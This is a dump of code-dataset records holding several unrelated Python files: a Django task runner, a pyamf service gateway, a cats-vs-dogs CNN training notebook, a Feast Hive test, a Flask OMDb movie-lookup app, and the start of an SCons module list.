\"\"\"\n model_input = self.preprocess(data)\n model_output = self.inference(model_input)\n return self.postprocess(model_output)","sub_path":"examples/TextCNN_handle.py","file_name":"TextCNN_handle.py","file_ext":"py","file_size_in_byte":7270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"525659899","text":"from multiprocessing import Process\n\nimport Twilio.settings as settings\nfrom django.db import connection \nimport Appis.common as common\nimport time\n\nfrom Appis.Tool import index as worker\n# Create your views here.\n\nWAIT_MINUTES = settings.WAIT_MINUTES\n\ndef tick(id, way):\n\n connection.close()\n \n if way == common.WAY[0][0]:\n worker.serial_task(id)\n if way == common.WAY[1][0]:\n worker.serial_email(id)\n \nclass TaskProcess(Process):\n task_id = 0\n way = common.WAY[0][0]\n one = True\n def __init__(self, task_id, way, one = True):\n super().__init__()\n self.task_id = task_id\n self.way = way\n self.one = one\n\n def run(self):\n if self.one:\n time.sleep(60*WAIT_MINUTES)\n\n tick(self.task_id, self.way)\n else:\n time.sleep(10)\n for ids in self.task_id:\n tick(ids, self.way)\n time.sleep(0.5)\n","sub_path":"Twilio/Appis/Record/APSTask.py","file_name":"APSTask.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"292943244","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport cv\nimport sys\n\nfrom pykoki import PyKoki, Point2Di, Point2Df, CameraParams\n\nif len(sys.argv) != 2:\n print(\"opencv_example.py IMG_FILE\", file=sys.stderr)\n exit(1)\n\nfilename = sys.argv[1]\n\nimg = cv.LoadImage( filename, cv.CV_LOAD_IMAGE_GRAYSCALE )\nassert img, \"Failed to load image at {0}\".format(filename)\n\nkoki = PyKoki()\n\nparams = CameraParams(Point2Df( img.width/2, img.height/2 ),\n Point2Df(571, 571),\n Point2Di( img.width, img.height ))\n\nprint(koki.find_markers( img, 0.1, params ))\n","sub_path":"opencv_example.py","file_name":"opencv_example.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"112406163","text":"#coding: utf-8\r\n'''\r\nCreated on 2014-3-24\r\n\r\n@author: Administrator\r\n'''\r\nimport json\r\nimport re\r\nimport os\r\nimport logging, traceback\r\nfrom functools import wraps\r\nfrom django.utils.decorators import available_attrs\r\nfrom account.models import AuthUser\r\nfrom library.models import Library\r\n\r\ndef json_data(code, data):\r\n return json.dumps({'code':code, 'data':data})\r\n\r\ndef SuccessResponse(data=''):\r\n return json_data(1, data)\r\n\r\ndef FailResponse(data):\r\n return json_data(-1, data)\r\n\r\ndef get_library(library_id):\r\n try: library_id = int(library_id)\r\n except: return None\r\n \r\n try: library = Library.objects.get(id=library_id)\r\n except(Library.DoesNotExist): library = None\r\n return library\r\n\r\ndef echo(request, data):\r\n return \"echo:%s\" % data\r\n\r\nimport views_auth\r\nimport views_diy\r\nimport views_opus\r\nimport views_personal\r\nimport views_public\r\nimport views_story\r\nimport views_3qdou_new\r\nimport views_zone\r\nimport views_topic\r\nimport views_activity\r\n\r\nservices = {\r\n 'myservice.echo': echo,\r\n # could include other functions as well\r\n \r\n 'AccountService.reg_checkusername': views_auth.reg_checkusername,\r\n 'AccountService.reg_checknickname': views_auth.reg_checknickname,\r\n 'AccountService.register': views_auth.register,\r\n 'AccountService.guest_login': views_auth.guest_login,\r\n 'AccountService.guest_register': views_auth.guest_register,\r\n 'AccountService.login': views_auth.login,\r\n 'AccountService.logout': views_auth.logout,\r\n 'AccountService.get_account': views_auth.get_account,\r\n 'AccountService.update_account': views_auth.update_account,\r\n 'AccountService.change_pass': views_auth.change_pass,\r\n 'AccountService.question': views_auth.question,\r\n 'AccountService.reset_password': views_auth.reset_password,\r\n \r\n 'DiyService.get_lib_info': views_diy.get_lib_info, #开始得到图书馆的基本信息\r\n 'DiyService.get_font_list': views_diy.get_font_list,\r\n # 获取新版字体设计的文本框列表 coder: kamihait 2015/42\r\n 'DiyService.get_new_font_list': views_diy.get_new_font_list,\r\n 'DiyService.get_font_img': views_diy.get_font_img,\r\n 'DiyService.update_avatar': views_diy.update_avatar,\r\n 'DiyService.get_res_url': views_diy.get_res_url,\r\n 'DiyService.get_personal_url': views_diy.get_personal_url,\r\n 'DiyService.get_public_url': views_public.get_public_url,\r\n \r\n \r\n 'DiyService.get_zone_type_list': views_diy.get_zone_type_list,\r\n 'DiyService.get_zone_style_list': views_diy.get_zone_style_list,\r\n 'DiyService.get_opus_type_list': views_diy.get_opus_type_list,\r\n 'DiyService.get_opus_class_list': views_diy.get_opus_class_list,\r\n 'DiyService.get_opus_size_list': views_diy.get_opus_size_list,\r\n # 获取个人作品的所有子类列表\r\n 'DiyService.get_opus_class_child_list': views_diy.get_opus_class_child_list,\r\n \r\n 'DiyService.get_notice_list': views_diy.get_notice_list,\r\n 'DiyService.get_msg_list': views_diy.get_msg_list,\r\n 'DiyService.get_index_list': views_diy.get_index_list, #首页作品列表,包含原创和个人分享作品\r\n \r\n 'DiyService.get_zone_list': views_public.get_zone_list, #all\r\n 'DiyService.get_bg_list': views_public.get_bg_list, #1\r\n 'DiyService.get_bg_list2': views_public.get_bg_list2, #背景列表,需要根据单双页区分\r\n 'DiyService.get_decorator_list': views_public.get_decorator_list, #2\r\n 'DiyService.get_frame_list': views_public.get_frame_list, #3\r\n 'DiyService.get_template_list': views_public.get_template_list, #4\r\n 'DiyService.get_template_list2': views_public.get_template_list2, #4\r\n 'DiyService.get_audio_list': views_public.get_audio_list, #5\r\n 'DiyService.get_video_list': views_public.get_video_list, #6\r\n 'DiyService.get_template_info': views_public.get_template_info, #得到模板详细信息\r\n \r\n 'DiyService.get_blank_opus': views_public.get_blank_opus, #一个空作品的所有信息\r\n \r\n 'DiyService.like_personal_res': views_zone.like_personal_res,\r\n 'DiyService.like_public_res': views_zone.like_public_res,\r\n 'DiyService.fetch_bg_list': views_zone.fetch_bg_list,\r\n 'DiyService.fetch_decorator_list': views_zone.fetch_decorator_list,\r\n 'DiyService.fetch_frame_list': views_zone.fetch_frame_list,\r\n 'DiyService.fetch_template_list': views_zone.fetch_template_list,\r\n 'DiyService.fetch_template_info': views_zone.fetch_template_info,\r\n #'DiyService.fetch_mark_list': views_zone.fetch_mark_list,\r\n #'DiyService.fetch_emotion_list': views_zone.fetch_emotion_list,\r\n \r\n \r\n 'DiyService.fetch_audio_list': views_zone.fetch_audio_list,\r\n 'DiyService.fetch_video_list': views_zone.fetch_video_list,\r\n 'DiyService.fetch_picture_list': views_zone.fetch_picture_list, #创作平台,得到相关资源\r\n 'DiyService.fetch_scrawl_list': views_zone.fetch_scrawl_list, #涂鸦列表\r\n\r\n 'DiyService.get_press_list': views_opus.get_press_list,\r\n 'DiyService.get_opus_list': views_opus.get_opus_list, #个人空间,得到个人作品列表\r\n 'DiyService.get_opus_info': views_opus.get_opus_info,\r\n 'DiyService.view_opus': views_opus.view_opus,\r\n #'DiyService.get_opus_page_image': views_opus.get_opus_page_image,\r\n #'DiyService.get_opus_page_json': views_opus.get_opus_page_json,\r\n \r\n 'DiyService.create_opus': views_opus.create_opus, #新建作品\r\n 'DiyService.new_opus_page': views_opus.new_opus_page,\r\n 'DiyService.update_opus_page': views_opus.update_opus_page,\r\n 'DiyService.update_opus_info': views_opus.update_opus_info,\r\n 'DiyService.apply_for_press': views_opus.apply_for_press, #申请发表作品\r\n 'DiyService.apply_for_template': views_opus.apply_for_template, #作品转为模板\r\n 'DiyService.delete_opus': views_opus.delete_opus, #删除个人作品\r\n 'DiyService.delete_opus_page': views_opus.delete_opus_page,\r\n 'DiyService.change_opus_page': views_opus.change_opus_page,\r\n 'DiyService.copy_opus': views_opus.copy_opus, #复制作品\r\n \r\n #'DiyService.grade_opus': views_opus.grade_opus, #评级某个作品\r\n #'DiyService.comment_opus': views_opus.comment_opus, #评论某个作品\r\n #'DiyService.get_comment_list': views_opus.get_comment_list,\r\n #'DiyService.praise_opus': views_opus.praise_opus, #对某个作品点赞\r\n \r\n 'DiyService.grade_opus': views_opus.grade_opus_mongo, #评级某个作品\r\n 'DiyService.comment_opus': views_opus.comment_opus_mongo, #评论某个作品\r\n 'DiyService.get_comment_list': views_opus.get_comment_list_mongo,\r\n 'DiyService.praise_opus': views_opus.praise_opus_mongo, #对某个作品点赞\r\n \r\n \r\n 'DiyService.create_album': views_personal.create_album, #创建相册\r\n 'DiyService.get_album_list': views_personal.get_album_list, #得到���册列表\r\n #'DiyService.upload_personal_res': views_personal.upload_personal_res, #不需要这个接口了\r\n 'DiyService.get_personal_res': views_personal.get_personal_res,\r\n 'DiyService.delete_personal_res': views_personal.delete_personal_res,\r\n 'DiyService.delete_album': views_personal.delete_album,\r\n 'DiyService.update_scrawl': views_personal.update_scrawl, #涂鸦\r\n 'DiyService.get_scrawl_list': views_personal.get_scrawl_list,\r\n 'DiyService.delete_scrawl': views_personal.delete_scrawl,\r\n 'DiyService.update_camera_image': views_personal.update_camera_image, #摄像头自拍 的没手机自拍?\r\n \r\n #故事大王比赛接口\r\n 'StoryService.get_province_list': views_story.get_province_list,\r\n 'StoryService.get_city_list': views_story.get_city_list,\r\n 'StoryService.get_county_list': views_story.get_county_list,\r\n 'StoryService.get_story_list': views_story.get_story_list,\r\n 'StoryService.vote_story': views_story.vote_story,\r\n \r\n #学习资源库get_3qdou_catalog\r\n 'DouService.get_3qdou_catalog': views_3qdou_new.get_3qdou_catalog,\r\n 'DouService.get_all_list': views_3qdou_new.get_all_list, #得到所有资源列表\r\n 'DouService.search_res_list': views_3qdou_new.search_res_list,\r\n \r\n 'TopicService.get_emotion_type_list': views_topic.get_emotion_type_list, #得到表情分类\r\n 'TopicService.fetch_topic_template': views_topic.fetch_topic_template,\r\n 'TopicService.fetch_topic_mark': views_topic.fetch_topic_mark,\r\n 'TopicService.fetch_topic_emotion': views_topic.fetch_topic_emotion,\r\n \r\n 'TopicService.get_topic_classify': views_topic.get_topic_classify, #得到活题分类列表\r\n # 创建话题\r\n 'TopicService.update_topic': views_topic.update_topic,\r\n 'TopicService.fetch_topic_info': views_topic.fetch_topic_info,\r\n 'TopicService.join_topic': views_topic.join_topic,\r\n # 获取话题列表\r\n 'TopicService.fetch_topic_list': views_topic.fetch_topic_list,\r\n 'TopicService.fetch_topic_page': views_topic.fetch_topic_page,\r\n # 话题点赞\r\n 'TopicService.topic_praise': views_topic.topic_praise,\r\n # 增加话题评论\r\n 'TopicService.create_topic_remark': views_topic.create_remark,\r\n # 获取话题评论列表\r\n 'TopicService.get_remark_list': views_topic.get_remark_list,\r\n # 获取指定话题\r\n 'TopicService.fetch_topic_one': views_topic.fetch_topic_one,\r\n\r\n 'ActivityService.get_province_list': views_activity.get_province_list,\r\n 'ActivityService.get_city_list': views_activity.get_city_list,\r\n 'ActivityService.get_county_list': views_activity.get_county_list,\r\n \r\n 'ActivityService.fetch_activity_list': views_activity.fetch_activity_list,\r\n 'ActivityService.fetch_activity_info': views_activity.fetch_activity_info,\r\n # 获取活动与系列活动的活动列表\r\n 'ActivityService.search_activity_and_series': views_activity.get_activity_and_series,\r\n \r\n 'ActivityService.fetch_activity_fruit_list': views_activity.fetch_activity_fruit_list,\r\n 'ActivityService.grade_fruit': views_activity.grade_fruit,\r\n #'ActivityService.comment_fruit': views_activity.comment_fruit,\r\n #'ActivityService.get_comment_list': views_activity.get_comment_list,\r\n 'ActivityService.comment_fruit': views_activity.comment_fruit_mongo,\r\n 'ActivityService.get_comment_list': views_activity.get_comment_list_mongo,\r\n 'ActivityService.praise_fruit': views_activity.praise_fruit_mongodb,\r\n 'ActivityService.preview_fruit': views_activity.preview_fruit,\r\n 'ActivityService.get_client_ip': views_activity.get_client_ip,\r\n #'ActivityService.vote_fruit': views_activity.vote_fruit,\r\n 'ActivityService.vote_fruit': views_activity.vote_fruit_mongo,\r\n\r\n # 搜索活动和作品的混合列表\r\n 'ActivityService.search_activity_and_fruit': views_activity.search_activity_and_fruit,\r\n # 搜索系列活动列表\r\n # editor: kamihati 2015/5/13 用户客户端点击系列活动时取出子活动列表\r\n 'ActivityService.get_series_activity': views_activity.get_series_activity,\r\n 'ActivityService.update_activity': views_activity.update_activity,\r\n 'ActivityService.update_activity_option': views_activity.update_activity_option,\r\n 'ActivityService.update_activity_group': views_activity.update_activity_group,\r\n 'ActivityService.update_activity_group_list': views_activity.update_activity_group_list,\r\n # coder: kamihati 2015/4/8 修改参赛逻辑符合新版要求\r\n 'ActivityService.update_activity_fruit': views_activity.update_activity_fruit,\r\n 'ActivityService.apply_activity': views_activity.apply_activity,\r\n 'ActivityService.delete_activity': views_activity.delete_activity,\r\n 'ActivityService.apply_fruit': views_activity.apply_fruit,\r\n 'ActivityService.delete_fruit': views_activity.delete_fruit,\r\n 'ActivityService.approve_fruit': views_activity.approve_fruit,\r\n\r\n # 活动报名 editor: kamihati 2015//6/5\r\n 'ActivityService.sign_activity_member': views_activity.sign_activity_member,\r\n # 是否报名 editor: kamihati: 2015/6/5\r\n 'ActivityService.has_activity_signup': views_activity.has_activity_signup,\r\n}\r\n\r\n\r\nfrom pyamf.remoting.gateway.django import DjangoGateway\r\nfrom WebZone.settings import DEBUG\r\nWebZoneGateway = DjangoGateway(services, debug=DEBUG)\r\n\r\n\r\n#WebZoneGateway = DjangoGateway(services, debug=is_debug, timezone_offset=28800, expose_request=False)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"gateway/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"109185957","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nget_ipython().system('wget --no-check-certificate https://storage.googleapis.com/mledu-datasets/cats_and_dogs_filtered.zip -O /tmp/cats_and_dogs_filtered.zip')\n\n\n# In[1]:\n\n\nimport os\nimport zipfile\n\n\n# In[7]:\n\n\nos.listdir('data/train/cats')\n\n\n# In[8]:\n\n\nbase_dir = 'data/'\ntrain_dir = os.path.join(base_dir, 'train/')\nvalidation_dir = os.path.join(base_dir, 'validation/')\ntrain_cats_dir = os.path.join(train_dir, 'cats')\ntrain_dogs_dir = os.path.join(train_dir, 'dogs')\nvalidation_cats_dir = os.path.join(validation_dir, 'cats')\nvalidation_dogs_dir = os.path.join(validation_dir, 'dogs')\n\n\n# In[9]:\n\n\ntrain_cat_fnames = os.listdir(train_cats_dir)\ntrain_dog_fnames = os.listdir(train_dogs_dir)\nprint(train_cat_fnames[:10])\nprint(train_dog_fnames[:10])\n\n\n# In[10]:\n\n\nprint('The total training cat images:', len(os.listdir(train_cats_dir)))\nprint('The total training dog images:', len(os.listdir(train_dogs_dir)))\nprint('The total validation cat images:', len(os.listdir(validation_cats_dir)))\nprint('The total validation dog images:', len(os.listdir(validation_dogs_dir)))\n\n\n# In[11]:\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[12]:\n\n\nnrows = 4\nncols = 4\npic_index = 0\n\n\n# In[13]:\n\n\nfig = plt.gcf()\nfig.set_size_inches(ncols*4, nrows*4)\npic_index += 8\nnext_cat_pic = [os.path.join(train_cats_dir, fname) for fname in train_cat_fnames[pic_index-8:pic_index]]\nnext_dog_pic = [os.path.join(train_dogs_dir, fname) for fname in train_dog_fnames[pic_index-8:pic_index]]\nfor i, img_path in enumerate(next_cat_pic+next_dog_pic):\n s = plt.subplot(nrows, ncols, i+1)\n s.axis('Off')\n img = mpimg.imread(img_path)\n plt.imshow(img)\nplt.show()\n\n\n# In[14]:\n\n\n# Building The Model\n\n\n# In[15]:\n\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\n\n# In[16]:\n\n\nmodel = keras.models.Sequential([\n keras.layers.Conv2D(16, (3, 3), activation = 'relu', input_shape = (150, 150, 3)),\n keras.layers.MaxPooling2D(2, 2),\n keras.layers.Conv2D(32, (3, 3), activation = 'relu'),\n keras.layers.MaxPooling2D(2, 2),\n keras.layers.Conv2D(64, (3, 3), activation = 'relu'),\n keras.layers.MaxPooling2D(2, 2),\n keras.layers.Flatten(),\n keras.layers.Dense(512, activation = 'relu'),\n keras.layers.Dense(1, activation = 'sigmoid'),\n])\n\n\n# In[17]:\n\n\nmodel.summary()\n\n\n# In[18]:\n\n\nfrom tensorflow.keras.optimizers import RMSprop\n\n\n# In[19]:\n\n\nmodel.compile(optimizer = RMSprop(lr = 0.001),\n loss = 'binary_crossentropy',\n metrics = ['accuracy'],\n )\n\n\n# In[20]:\n\n\n# Setting up the DataGenerators\n\n\n# In[21]:\n\n\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n\n# In[22]:\n\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255)\ntest_datagen = ImageDataGenerator(rescale = 1./255)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_dir,\n target_size = (150, 150),\n batch_size = 20,\n class_mode = 'binary',\n)\n\nvalidation_generator = test_datagen.flow_from_directory(\n validation_dir,\n target_size = (150, 150),\n batch_size = 20,\n class_mode = 'binary',\n)\n\n\n# In[23]:\n\n\nhistory = model.fit(\n train_generator,\n steps_per_epoch = 100,\n epochs = 15,\n validation_data = validation_generator,\n validation_steps = 50,\n verbose = 2,\n)\n\n\n# In[24]:\n\n\n# Evaluating The Model\n\n\n# In[25]:\n\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\nepochs = range(len(acc))\nplt.plot(epochs, acc)\nplt.plot(epochs, val_acc)\nplt.title('The Training and The Validation Accuracy')\nplt.figure()\n\nplt.plot(epochs, loss)\nplt.plot(epochs, val_loss)\nplt.title('The Training and The Validation Loss')\nplt.show()\n\n\n# As we can see this model is overfitting to the training data. To solve this problem, we can use the data/image augmentation techniques like rotating the image by an angle or moving the object around the image, zooming in and out of the image.\n\n# In[26]:\n\n\ntrain_datagen_aug = ImageDataGenerator(\n rescale = 1./255,\n rotation_range = 40,\n width_shift_range = 0.2,\n height_shift_range = 0.2,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True,\n fill_mode = 'nearest'\n)\n\nvalidation_datagen_aug = ImageDataGenerator(\n rescale = 1./255,\n rotation_range = 40,\n width_shift_range = 0.2,\n height_shift_range = 0.2,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True,\n fill_mode = 'nearest'\n)\n\ntrain_generator_aug = train_datagen_aug.flow_from_directory(\n train_dir,\n target_size = (150, 150),\n batch_size = 20,\n class_mode = 'binary',\n)\n\nvalidation_generator_aug = validation_datagen_aug.flow_from_directory(\n validation_dir,\n target_size = (150, 150),\n batch_size = 20,\n class_mode = 'binary',\n)\n\n\n# In[ ]:\n\n\nhistory_aug = model.fit(\n train_generator_aug,\n steps_per_epoch = 100,\n epochs = 15,\n validation_data = validation_generator_aug,\n validation_steps = 50,\n verbose = 2,\n)\n\n\n# Now we will plot the graph.\n\n# In[ ]:\n\n\nacc = history_aug.history['accuracy']\nvalidation_acc = history_aug.history['val_accuracy']\nloss = history_aug.history['loss']\nvalidation_loss = history_aug.history['val_loss']\n\nepochs = range(len(acc))\nplt.plot(epochs, acc, 'bo', label=\"Training Accuracy\")\nplt.plot(epochs, validation_acc, 'b', label=\"Validation Accuracy\")\nplt.title(\"Training Vs Validation Accuracy\")\nplt.figure()\nplt.plot(epochs, loss, 'bo', label=\"Training Loss\")\nplt.plot(epochs, validation_loss, 'b', label=\"Validation Loss\")\nplt.title(\"Training Vs Validation Loss\")\nplt.show()\n\n\n# This fixes the overfitting problem to some extent.\n\n# In[ ]:\n\n\n# Now implementing Transfer Learning\n\n\n# In[ ]:\n\n\nimport os\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.applications.inception_v3 import InceptionV3\n\n\n# In[ ]:\n\n\nget_ipython().system('wget --no-check-certificate https://storage.googleapis.com/mledu-datasets/inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5 -O /tmp/inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5')\n\n\n# In[ ]:\n\n\nlocal_weights_file = '/tmp/inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5'\n\n\n# In[ ]:\n\n\npre_trained_model = InceptionV3(input_shape = (150, 150, 3), include_top = False, weights = None)\npre_trained_model.load_weights(local_weights_file)\nfor layer in pre_trained_model.layers:\n layer.trainable = False\n\n\n# In[ ]:\n\n\npre_trained_model.summary()\n\n\n# In[ ]:\n\n\nlast_layer = pre_trained_model.get_layer('mixed7')\nlast_output = last_layer.output\n\n\n# In[ ]:\n\n\nfrom tensorflow.keras.optimizers import RMSprop\n\n\n# In[ ]:\n\n\nx = layers.Flatten()(last_output)\nx = layers.Dense(1024, activation = 'relu')(x)\nx = layers.Dense(1, activation = 'sigmoid')(x)\n\n\n# In[ ]:\n\n\nmodel = Model(pre_trained_model.input, x)\nmodel.compile(\n optimizer = RMSprop(lr = 0.001),\n loss = 'binary_crossentropy',\n metrics = ['accuracy']\n)\n\n\n# In[ ]:\n\n\nhistory_transfer = model.fit_generator(\n train_generator_aug,\n validation_data = validation_generator_aug,\n steps_per_epoch = 100,\n epochs = 20,\n validation_steps = 50,\n verbose = 2,\n)\n\n\n# In[ ]:\n\n\n# Now we will plot the graphs\n\n\n# In[ ]:\n\n\nacc = history_transfer.history['accuracy']\nvalidation_acc = history_transfer.history['val_accuracy']\nloss = history_transfer.history['loss']\nvalidation_loss = history_transfer.history['val_loss']\n\nepochs = range(len(acc))\nplt.plot(epochs, acc, 'bo', label='Training Accuracy')\nplt.plot(epochs, validation_acc, 'b', label='Validation Accuracy')\nplt.title('Training Vs Validation Accuracy')\nplt.figure()\n\nplt.plot(epochs, loss, 'bo', label='Training Loss')\nplt.plot(epochs, validation_loss, 'b', label='Validation Loss')\nplt.title(\"Training Vs Validation Loss\")\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Cats_Vs_Dogs-Copy1.py","file_name":"Cats_Vs_Dogs-Copy1.py","file_ext":"py","file_size_in_byte":7929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"1037992","text":"import os\nimport random\nimport sys\nimport time\nfrom datetime import datetime\n\nimport pytest\nfrom feast.infra.offline_stores import offline_utils\n\nfrom impala.dbapi import connect\n\nfrom feast_hive import offline_store, HiveOfflineStoreConfig\nfrom tests.helper import generate_entities, get_hive_cursor, with_cursor\n\n\n# @with_cursor\n# def test_upload_entity_df(cursor):\n# start_date = datetime.now().replace(microsecond=0, second=0, minute=0)\n# (_, _, _, entity_df, _,) = generate_entities(start_date, False)\n\n# # Test upload entity_df to Hive\n# table_name_1 = offline_utils.get_temp_entity_table_name()\n# schema_1 = offline_store._upload_entity_df_and_get_entity_schema(\n# table_name_1, entity_df, cursor\n# )\n# cursor.execute_async(f\"SELECT * FROM {table_name_1}\")\n# new_entity_df_1 = offline_store.HiveRetrievalJob(cursor).to_df()\n# assert len(entity_df) == len(new_entity_df_1)\n\n# # Test upload by Query\n# table_name_2 = offline_utils.get_temp_entity_table_name()\n# schema_2 = offline_store._upload_entity_df_and_get_entity_schema(\n# table_name_2, f\"SELECT * FROM {table_name_1}\", cursor\n# )\n# cursor.execute_async(f\"SELECT * FROM {table_name_2}\")\n# new_entity_df_2 = offline_store.HiveRetrievalJob(cursor).to_df()\n# assert new_entity_df_2.equals(new_entity_df_1)\n\n\n@pytest.mark.parametrize(\n \"provider_type\", [\"local\"],\n)\n@pytest.mark.parametrize(\n \"infer_event_timestamp_col\", [False, True],\n)\n@pytest.mark.parametrize(\n \"full_feature_names\", [False, True],\n)\ndef test_historical_features_from_hive_sources(\n provider_type, infer_event_timestamp_col, capsys, full_feature_names, pytestconfig\n):\n hive_offline_store = HiveOfflineStoreConfig(\n host=pytestconfig.getoption(\"hive_host\"),\n port=int(pytestconfig.getoption(\"hive_port\")),\n )\n\n start_date = datetime.now().replace(microsecond=0, second=0, minute=0)\n (\n customer_entities,\n driver_entities,\n end_date,\n orders_df,\n start_date,\n ) = generate_entities(start_date, infer_event_timestamp_col)\n\n table_prefix = (\n f\"test_hist_retrieval_{int(time.time_ns())}_{random.randint(1000, 9999)}\"\n )\n\n # Stage orders_df to Hive\n table_name = f\"{table_prefix}_orders\"\n entity_df_query = f\"SELECT * FROM {table_name}\"\n schema_1 = offline_store._upload_entity_df(table_name, orders_df, cursor)\n orders_context = aws_utils.temporarily_upload_df_to_redshift(\n client,\n offline_store.cluster_id,\n offline_store.database,\n offline_store.user,\n s3,\n f\"{offline_store.s3_staging_location}/copy/{table_name}.parquet\",\n offline_store.iam_role,\n table_name,\n orders_df,\n )\n","sub_path":"tests/test_hive_offline_store.py","file_name":"test_hive_offline_store.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"341881201","text":"##\n# Homework project: task 5 for week 3 (see for details, see ../../homework.md)\n# Note:\n# The purpose of this exercise is to get introduced to the requests module\n# So I am removing all bokeh- and database-related code\n#\nfrom flask import Flask, render_template\nfrom flask import jsonify\nimport requests\n\nBASE = 'http://www.omdbapi.com/?t={0}&y=&plot=short&r=json'\n\napp = Flask(__name__)\n\n##\n# Hello world sanity check\n#\n@app.route(\"/\")\ndef hello():\n return 'Hello'\n\n##\n# Code copy-and-pasted from the Real Python version in rp_app.py\n# Except: I am adding a route....\n#\n@app.route('/find_movie')\ndef index():\n movie_name = 'star wars'\n url = BASE.format(movie_name)\n r = requests.get(url)\n json_response = r.json()\n print(json_response)\n return jsonify(json_response)\n\n##\n# \"fm\" is lazy-typists speak for Find Movie\n#\n@app.route( '/fm' )\ndef fm():\n print( 'No movie_name specified (in the \"/fm\" route)')\n movie_name = 'silence%20of%20the%20lambs'\n return find_movie( movie_name )\n\n##\n# Version of \"fm\" route that accepts a movie_name\n#\n@app.route( '/fm/' )\ndef fm_param( movie_name ):\n print( 'movie_name:', movie_name )\n if movie_name == '': ## I believe this is unnecessary\n movie_name = 'american gangster' ## and perhaps overly-paranoid\n return find_movie( movie_name )\n\n##\n# Shared subroutine to find the movie\n#\nFORMAT_THE_JSON = False\n## FORMAT_THE_JSON = True\ndef find_movie( movie_name ):\n url = BASE.format(movie_name)\n response = requests.get(url)\n json_response = response.json()\n jsonified_response = jsonify(json_response)\n print( 'json_response:', json_response )\n print( 'jsonified_response:', jsonified_response )\n if FORMAT_THE_JSON :\n return jsonified_response\n else:\n return render_template( 'json.html', json_response=json_response )\n\n##\n# Run the app!\n#\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"08-real_python_class/2017_02_21-Lesson_3/homework/5-omdb_api/project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"214312134","text":"import os\n\n\nclass Module:\n \"\"\"Represents a module of the code with its names, its list of sources\n its #ifdef macro and a list of other modules it depends on\n \"\"\"\n def __init__(self, name,\n sources=[],\n macro=\"\",\n win32_sources=[],\n linux_sources=[],\n dependencies=[]):\n self.name = name\n self.sources = sources\n self.macro = macro\n self.win32_sources = win32_sources\n self.linux_sources = linux_sources\n self.dependencies = dependencies\n\n def add(self, sources, env, deps=[], check=True):\n \"\"\"Addition of a module's sources including\n additional check for dependencies and\n recursive addition of said dependencies\n\n -sources: The list of sources for compilation\n -env: The Scons environment\n -deps: A list of current modules to build -- helps in\n avoiding duplication\n -check: A flag to determine whether we should check for\n dependencies or not\n \"\"\"\n env.Append(CPPDEFINES={self.macro: None})\n sources.extend(self.sources)\n if(env['TARGET_SYSTEM'] == 'Windows'):\n sources.extend(self.win32_sources)\n else:\n sources.extend(self.linux_sources)\n if check:\n needed = set(self.dependencies)-set(deps)\n for m in modules:\n if m.name in needed:\n deps.append(m.name)\n m.add(sources, env, deps, True)\n\n\n# empty list of modules and sources\nsources = []\nmodules = []\n\n# add all the modules one by one\nmodules.append(\n Module(\"CORE\",\n ['refu.c',\n 'Utils/endianess.c',\n 'Utils/log.c',\n 'Utils/math.c',\n 'Persistent/buffers.c',\n 'Utils/buffer.c',\n 'Utils/array.c',\n 'Utils/rf_unicode.c',\n 'Utils/hash.c',\n 'Numeric/Integer/conversion.c'])\n)\n\nmodules.append(\n Module(\"STRING\",\n ['String/rf_str_common.c', 'String/rf_str_commonp.c',\n 'String/rf_str_conversion.c',\n 'String/rf_str_conversionp.c',\n 'String/rf_str_core.c', 'String/rf_str_corex.c',\n 'String/rf_str_files.c',\n 'String/rf_str_filesx.c', 'String/rf_str_module.c',\n 'String/rf_str_manipulation.c',\n 'String/rf_str_manipulationx.c', 'String/rf_str_retrieval.c',\n 'String/rf_str_traversalx.c'],\n macro=\"RF_MODULE_STRINGS\",\n dependencies=['IO'])\n)\n\nmodules.append(\n Module(\"PARALLEL\",\n ['Parallel/rf_threading.c'],\n win32_sources=[''],\n linux_sources=['Parallel/rf_worker_pool_linux.c',\n 'Parallel/rf_threading_linux.c'],\n macro=\"RF_MODULE_PARALLEL\",\n dependencies=[\"INTRUSIVE_LIST\"])\n)\n\nmodules.append(\n Module(\"IO\",\n ['IO/rf_file.c'],\n macro=\"RF_MODULE_IO\",\n win32_sources=[],\n linux_sources=[])\n)\n\nmodules.append(\n Module(\"TEXTFILE\",\n ['IO/rf_textfile.c'],\n macro=\"RF_MODULE_IO_TEXTFILE\",\n dependencies=['STRING'])\n)\n\nmodules.append(\n Module(\"INTRUSIVE_LIST\",\n ['Data_Structures/intrusive_list.c'],\n 